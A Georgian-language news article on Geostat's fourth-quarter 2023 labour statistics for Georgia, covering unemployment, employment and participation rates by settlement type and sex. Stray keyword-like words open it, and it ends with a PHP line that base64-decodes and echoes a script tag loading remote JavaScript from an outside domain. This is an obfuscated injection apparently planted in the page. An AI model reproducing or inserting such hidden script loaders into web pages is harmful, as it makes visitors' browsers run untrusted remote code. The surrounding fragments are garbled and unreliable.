celsiusi
ავერსი შნაიდერი

სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2023 წლის მეოთხე კვარტალში საქართველოში უმუშევრობის დონე, წინა წლის შესაბამის პერიოდთან შედარებით, 0.7 პროცენტული პუნქტით შემცირდა და 15.3 პროცენტი შეადგინა.

საქსტატის ცნობით, 2023 წლის მეოთხე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, დაქირავებულთა რიცხოვნობა გაიზარდა 74.3 ათასი კაცით, ანუ 8.4%-ით და 958.4 ათასს მიაღწია, ხოლო თვითდასაქმებულთა რიცხოვნობა 6.6 ათასით, ანუ 1.6%-ით შემცირდა და 413.8 ათასი შეადგინა.

ამავე პერიოდში უმუშევართა რაოდენობა შემცირდა 0.9 ათასით, ანუ 0.4%-ით და 248.6 ათასი შეადგინა. ამასთან, საანგარიშო პერიოდში სამუშაო ძალის მონაწილეობის დონე (სამუშაო ძალის წილი 15 წლის და უფროსი ასაკის მოსახლეობაში), წინა წლის შესაბამის პერიოდთან შედარებით, 1.7 პროცენტული პუნქტით გაიზარდა და 54.3 პროცენტით განისაზღვრა, ხოლო დასაქმების დონე გაიზარდა 1.8 პროცენტული პუნქტით და 46.0 პროცენტი შეადგინა.

სამუშაო ძალის მონაწილეობის დონე ქალაქის ტიპის დასახლებებში გაზრდილია 1.9 პროცენტული პუნქტით, სოფლის ტიპის დასახლებებში – 1.2 პროცენტული პუნქტით, ხოლო დასაქმების დონე ქალაქის ტიპის დასახლებებში გაზრდილია 1.7 პროცენტული პუნქტით, სოფლის ტიპის დასახლებებში – 1.8 პროცენტული პუნქტით და, შესაბამისად, 47.5 პროცენტს და 43.9 პროცენტს შეადგენს.

უწყების ამგარიშის მიხედვით, 2023 წლის მეოთხე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, დაქირავებულთა წილი დასაქმებულთა საერთო რაოდენობაში 2.1 პროცენტული პუნქტით გაიზარდა და 69.8 პროცენტი შეადგინა. ამასთან, მიმდინარე წლის მეოთხე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, უმუშევრობის დონე საქალაქო ტიპის დასახლებებში შემცირებულია 0.2 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში – 1.6 პროცენტული პუნქტით.

უმუშევრობის დონე, ტრადიციულად, მაღალია კაცებში, ქალებთან შედარებით. 2023 წლის მეოთხე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, აღნიშნული მაჩვენებელი ქალებში შემცირებულია 0.3 პროცენტული პუნქტით, ხოლო კაცებში – 1.0 პროცენტული პუნქტით და, შესაბამისად, 13.5 პროცენტს და 16.8 პროცენტს შეადგენს. სამუშაო ძალის მონაწილეობის დონე ქალებთან შედარებით მაღალია კაცებში.

2023 წლის მეოთხე კვარტალში აღნიშნული მაჩვენებელი ქალებში – 44.3 პროცენტს, ხოლო კაცებში 65.9 პროცენტს შეადგენდა. წინა წლის შესაბამის პერიოდთან შედარებით, სამუშაო ძალის მონაწილეობის დონე ქალებში გაზრდილია 1.6 პროცენტული პუნქტით, ხოლო კაცებში – 1.9 პროცენტული პუნქტით.

საქსტატის ინფორმაციით, 2023 წლის მეოთხე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, დასაქმების დონე გაზრდილია ქალებში 1.5 პროცენტული პუნქტით, ხოლო კაცებში – 2.2 პროცენტული პუნქტით.

243
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");